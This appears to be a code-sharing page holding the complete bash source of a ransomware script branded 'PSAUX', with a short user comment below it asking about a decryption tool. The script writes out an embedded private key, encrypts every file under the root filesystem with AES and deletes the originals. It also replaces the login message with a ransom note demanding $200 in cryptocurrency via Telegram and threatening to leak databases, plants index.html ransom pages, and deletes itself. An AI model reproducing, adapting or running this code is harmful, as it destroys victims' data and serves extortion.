|
#!/usr/bin/env bash |
|
|
|
private="-----BEGIN PRIVATE KEY----- |
|
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD |
|
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx |
|
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s |
|
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp |
|
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j |
|
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv |
|
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk |
|
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC |
|
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf |
|
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3 |
|
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw |
|
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y |
|
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs |
|
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL |
|
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z |
|
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX |
|
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI |
|
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx |
|
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb |
|
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I |
|
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH |
|
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee |
|
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD |
|
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/ |
|
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R |
|
yROWtY+JIbuJJb26/Z5/4KQ= |
|
-----END PRIVATE KEY-----" |
|
echo "$private" > /var/private.pem |
|
|
|
key_name="s2zp8fks9a0L" |
|
echo "Encryption ID: ${key_name}" |
|
|
|
PRIVATE_KEY_PATH="/var/private.pem" |
|
|
|
if [ ! -f "$PRIVATE_KEY_PATH" ]; then |
|
echo "Private key not found at $PRIVATE_KEY_PATH" |
|
exit 1 |
|
fi |
|
|
|
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH) |
|
if [ -z "$PRIVATE_KEY" ]; then |
|
echo "Could not read the private key (maybe permission issue?)" |
|
exit 1 |
|
fi |
|
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..." |
|
|
|
login_message=" |
|
|
|
|
|
###################################################################################### |
|
# Encryptions ID : ${key_name} # |
|
# You have been hacked by PSAUX # |
|
# # |
|
# All your files have been encrypted. # |
|
# # |
|
# To restore access, you can contact us in Telegram # |
|
# # |
|
# Telegram: @psauxsec # |
|
# # |
|
# Payment must be made in cryptocurrency. # |
|
# # |
|
# The price for decryption is 200 dollars. # |
|
# Sample decryption can be served upon request. # |
|
# # |
|
# After payment, you will receive a key to run the decrypter script # |
|
# on your system to restore your files. # |
|
# All your database is downloaded and if you are not going to pay in next 3 days # |
|
# its going to be published in darknet. Best Regards! # |
|
# # |
|
# # |
|
# # |
|
# Ransomware Made by PSAUX # |
|
# # |
|
###################################################################################### |
|
|
|
|
|
" |
|
echo "$login_message" > /etc/motd |
|
|
|
key=$(openssl rand -hex 16) |
|
iv=$(openssl rand -hex 16) |
|
echo "Generated key: ${key}" |
|
echo "Generated IV: ${iv}" |
|
|
|
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc |
|
if [ $? -eq 0 ]; then |
|
echo "Key encrypted successfully: /var/key.enc" |
|
else |
|
echo "Error with key encryption" |
|
exit 1 |
|
fi |
|
|
|
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc |
|
if [ $? -eq 0 ]; then |
|
echo "IV encrypted successfully: /var/iv.enc" |
|
else |
|
echo "Error with IV encryption" |
|
exit 1 |
|
fi |
|
|
|
excluded_dirs=( |
|
"/proc" |
|
"/sys" |
|
"/dev" |
|
"/run" |
|
"/etc" |
|
"/usr" |
|
"/tmp" |
|
"/var/run" |
|
"/var/lock" |
|
"/var/tmp" |
|
"/mnt" |
|
"/sbin" |
|
"/lib64" |
|
"/bin" |
|
"/boot" |
|
"/lib" |
|
"/lib32" |
|
"/srv" |
|
"/libx32" |
|
"/media" |
|
"/lost+found" |
|
) |
|
|
|
excluded_files=( |
|
"/var/key.enc" |
|
"/var/iv.enc" |
|
"/var/decrypter.sh" |
|
"/var/index_template.html" |
|
) |
|
|
|
is_excluded() { |
|
local path=$1 |
|
for excluded in "${excluded_dirs[@]}"; do |
|
if [[ "$path" == "$excluded"* ]]; then |
|
return 0 |
|
fi |
|
done |
|
for excluded in "${excluded_files[@]}"; do |
|
if [[ "$path" == "$excluded" ]]; then |
|
return 0 |
|
fi |
|
done |
|
return 1 |
|
} |
|
|
|
encrypt_directory() { |
|
local dir=$1 |
|
echo "Encrypting directory: $dir" |
|
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do |
|
if ! is_excluded "$file"; then |
|
echo "Encrypting file: $file" |
|
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux" |
|
if [ $? -eq 0 ]; then |
|
echo "[+] : ${file}.psaux" |
|
rm -f "$file" |
|
else |
|
echo "Error encrypting: $file" |
|
fi |
|
else |
|
echo "Excluded file: $file" |
|
fi |
|
done |
|
} |
|
|
|
encrypt_directory "/" |
|
|
|
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do |
|
if ! is_excluded "$dir"; then |
|
cp /var/index_template.html "$dir/index.html" |
|
fi |
|
done |
|
|
|
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do |
|
if ! is_excluded "$file"; then |
|
echo "[+] : $file" |
|
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux" |
|
if [ $? -eq 0 ]; then |
|
echo "[+] : ${file}.psaux" |
|
rm -f "$file" |
|
else |
|
echo "Error encrypting: $file" |
|
fi |
|
else |
|
echo "Excluded file: $file" |
|
fi |
|
done |
|
|
|
rm -- "$0" && exit 0 |
Hi @v0idxyz,
Thank you for sharing the decryption tool. I’ve noticed that some users have successfully decrypted .encryp files using it.
However, I’ve followed the provided instructions and encountered an issue. While the file extensions are changed, the content remains encrypted and unreadable.
Could you please provide additional guidance or clarify if there are any prerequisites or common mistakes to avoid? Your help would be greatly appreciated.
Thank you in advance!